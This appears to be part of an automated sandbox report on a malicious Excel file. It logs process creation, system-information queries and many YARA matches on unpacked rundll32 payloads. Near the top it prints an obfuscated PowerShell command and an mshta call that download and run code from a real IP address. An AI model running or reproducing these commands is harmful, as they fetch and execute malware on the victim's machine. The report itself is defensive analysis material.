Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",bVGdzkK
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Fjmda\xjvfkwqtmalp.bjg",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",ZDYuehCO
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Laexxctbixmkk\cdeeechcjx.ssq",DllRegisterServer
Source: Yara match File source: imedpub_6.xls, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\imedpub_6.xls, type: DROPPED

Language, Device and Operating System Detection

Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 9_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 9_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 9_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 11_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 11_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 11_2_10014B71
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 9_2_1003906D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 9_2_1003CE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA, 9_2_100453C8

Stealing of Sensitive Information

barindex
Source: Yara match File source: 13.2.rundll32.exe.3b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.620000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.27b0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2630000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2830000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2820000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.28a0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.340000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2420000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.340000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.4a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2d30000.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.280000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2c80000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.330000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.ac0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.bd0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3020000.27.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2820000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ef0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f40000.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f70000.25.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ec0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e00000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2420000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2700000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f60000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f70000.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.4a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2fc0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.620000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.430000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e90000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1f0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.27d0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2830000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2fc0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e80000.22.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.27b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3080000.29.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.25b0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2630000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.280000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2820000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2430000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.7f0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2d00000.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.20f0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.350000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.7f0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2660000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.bd0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f10000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.820000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2c80000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2e00000.21.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2eb0000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2fa0000.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3050000.28.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e90000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2ec0000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2f60000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2740000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.ba0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2e60000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2d30000.20.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.430000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2860000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.28a0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2f10000.23.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2700000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.ac0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.3020000.27.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2f60000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.27d0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.610000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3100000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.2c0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.2780000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.2800000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.10000000.30.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.3030000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.rundll32.exe.460000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED